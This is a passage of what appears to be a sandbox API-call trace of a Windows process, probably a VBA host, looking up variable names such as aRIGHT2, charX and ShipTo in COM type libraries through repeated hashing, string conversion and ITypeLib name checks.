pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.470] IUnknown:Release (This=0x731da90) returned 0x15 [0045.470] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.470] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="aRIGHT2", lHashVal=0x105ee7, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.470] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.470] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.470] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="aRIGHT2", lHashVal=0x105ee7, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.470] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.470] IMalloc:Alloc (This=0x7fefe015380, cb=0xf) returned 0x72f72a0 [0045.470] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aRIGHT2") returned 0x10626b [0045.470] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xf, _Src="_B_var_aRIGHT2" | out: _Dst="_B_var_aRIGHT2") returned 0x0 [0045.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=15, lpWideCharStr=0x2e46a0, cchWideChar=15 | out: lpWideCharStr="_B_var_aRIGHT2") returned 15 [0045.470] IUnknown:AddRef (This=0x782a220) returned 0x1f [0045.470] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_aRIGHT2", lHashVal=0x10626b, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.470] IUnknown:Release (This=0x782a220) returned 0x1e [0045.470] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.470] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_aRIGHT2", lHashVal=0x10626b, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.470] IUnknown:Release (This=0x731da90) returned 0x15 [0045.470] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.470] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_aRIGHT2", lHashVal=0x10626b, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.470] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.470] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.470] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_aRIGHT2", lHashVal=0x10626b, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.470] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.470] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.470] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_aRIGHT2", lHashVal=0x10626b, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.470] IUnknown:Release (This=0x782b300) returned 0x6 [0045.470] IUnknown:AddRef (This=0x782a220) returned 0x1f [0045.470] IUnknown:Release (This=0x782a220) returned 0x1e [0045.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a603ae, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="animY") returned 0 [0045.470] ITypeInfo:LocalReleaseVarDesc (This=0x784d1b0) returned 0x0 [0045.470] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aDOWN2") returned 0x104d9a [0045.470] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x7, _Src="aDOWN2" | out: _Dst="aDOWN2") returned 0x0 [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=7, lpWideCharStr=0x2e44f0, cchWideChar=7 | out: lpWideCharStr="aDOWN2") returned 7 [0045.471] IUnknown:AddRef (This=0x782a220) returned 0x20 [0045.471] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="aDOWN2", lHashVal=0x104d9a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.471] IUnknown:Release (This=0x782a220) returned 0x1f [0045.471] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.471] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="aDOWN2", lHashVal=0x104d9a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.471] IUnknown:Release (This=0x731da90) returned 0x15 [0045.471] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.471] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="aDOWN2", lHashVal=0x104d9a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.471] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.471] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.471] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="aDOWN2", lHashVal=0x104d9a, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.471] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.471] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0x72f72a0 [0045.471] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aDOWN2") returned 0x10c843 [0045.471] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xe, _Src="_B_var_aDOWN2" | out: _Dst="_B_var_aDOWN2") returned 0x0 [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4850, cbMultiByte=14, lpWideCharStr=0x2e46a0, cchWideChar=14 | out: lpWideCharStr="_B_var_aDOWN2") returned 14 [0045.471] IUnknown:AddRef (This=0x782a220) returned 0x20 [0045.471] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_aDOWN2", lHashVal=0x10c843, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.471] IUnknown:Release (This=0x782a220) returned 0x1f [0045.471] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.471] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_aDOWN2", lHashVal=0x10c843, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.471] IUnknown:Release (This=0x731da90) returned 0x15 [0045.471] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.471] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_aDOWN2", lHashVal=0x10c843, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.471] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.471] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.471] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_aDOWN2", lHashVal=0x10c843, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.471] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.471] IUnknown:AddRef (This=0x782b300) returned 0x7 [0045.471] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_aDOWN2", lHashVal=0x10c843, pfName=0x2e4770, pBstrLibName=0x2e46a0 | out: pfName=0x2e4770*=0, pBstrLibName=0x2e46a0) returned 0x0 [0045.471] IUnknown:Release (This=0x782b300) returned 0x6 [0045.471] IUnknown:AddRef (This=0x782a220) returned 0x20 [0045.471] IUnknown:Release (This=0x782a220) returned 0x1f [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a603ae, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="animY") returned 0 [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a604f6, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="animX") returned 0 [0045.471] wcscpy_s (in: _Destination=0xb5c8218, _SizeInWords=0x6, _Source="animX" | out: _Destination="animX") returned 0x0 [0045.472] IUnknown:QueryInterface (in: This=0x784d208, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e47b0 | out: ppvObject=0x2e47b0*=0x0) returned 0x80004002 [0045.472] IUnknown:QueryInterface (in: This=0x784d208, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4780 | out: ppvObject=0x2e4780*=0x0) returned 0x80004002 [0045.472] IUnknown:QueryInterface (in: This=0x784d208, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4770 | out: ppvObject=0x2e4770*=0x0) returned 0x80004002 [0045.472] IUnknown:QueryInterface (in: This=0x784d208, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4778 | out: ppvObject=0x2e4778*=0x0) returned 0x80004002 [0045.472] ITypeInfo:RemoteGetTypeAttr (in: This=0x784d208, ppTypeAttr=0x2e47a8, pDummy=0x10 | out: ppTypeAttr=0x2e47a8, pDummy=0x10) returned 0x0 [0045.472] ITypeInfo:LocalReleaseTypeAttr (This=0x784d208) returned 0x0 [0045.472] IUnknown:AddRef (This=0x784d208) returned 0x3 [0045.472] IMalloc:Free (This=0x7fefe015380, pv=0xb65a7d0) [0045.472] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb64ab90 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.472] wcscpy_s (in: _Destination=0xb64ac38, _SizeInWords=0x6, _Source="charX" | out: _Destination="charX") returned 0x0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.472] wcscpy_s (in: _Destination=0xb64ac50, _SizeInWords=0x6, _Source="charY" | out: _Destination="charY") returned 0x0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a6035a, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="KeyIs") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52cea, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charY") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a60292, cbMultiByte=3, lpWideCharStr=0x2e4560, cchWideChar=2 | out: lpWideCharStr="S") returned 0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52c96, cbMultiByte=7, lpWideCharStr=0x2e4560, cchWideChar=6 | out: lpWideCharStr="charX") returned 0 [0045.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0045.474] strcpy_s (in: _Dst=0x2e46a0, _DstSize=0x7, _Src="ShipTo" | out: _Dst="ShipTo") returned 0x0 [0045.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46a0, cbMultiByte=7, lpWideCharStr=0x2e44f0, cchWideChar=7 | out: lpWideCharStr="ShipTo") returned 7 [0045.474] IUnknown:AddRef (This=0x782a220) returned 0x22 [0045.474] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="ShipTo", lHashVal=0x106c90, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.474] IUnknown:Release (This=0x782a220) returned 0x21 [0045.474] IUnknown:AddRef (This=0x731da90) returned 0x16 [0045.474] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="ShipTo", lHashVal=0x106c90, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.474] IUnknown:Release (This=0x731da90) returned 0x15 [0045.474] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0045.474] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="ShipTo", lHashVal=0x106c90, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.474] IUnknown:Release (This=0x731cc80) returned 0x12 [0045.474] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0045.475] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="ShipTo", lHashVal=0x106c90, pfName=0x2e45c0, pBstrLibName=0x2e44f0 | out: pfName=0x2e45c0*=0, pBstrLibName=0x2e44f0) returned 0x0 [0045.475] IUnknown:Release (This=0x7829f50) returned 0x7 [0045.475] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0x72f72a0 [0045.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ShipTo") returned 0x10e739 [0045.475] strcpy_s (in: _Dst=0x2e4850, _DstSize=0xe, _Src="_B_var_ShipTo" | out: _Dst="_B_var_ShipTo") returned 0x0 [0045.475] MultiByteToWideChar (in: CodePage=0x0, 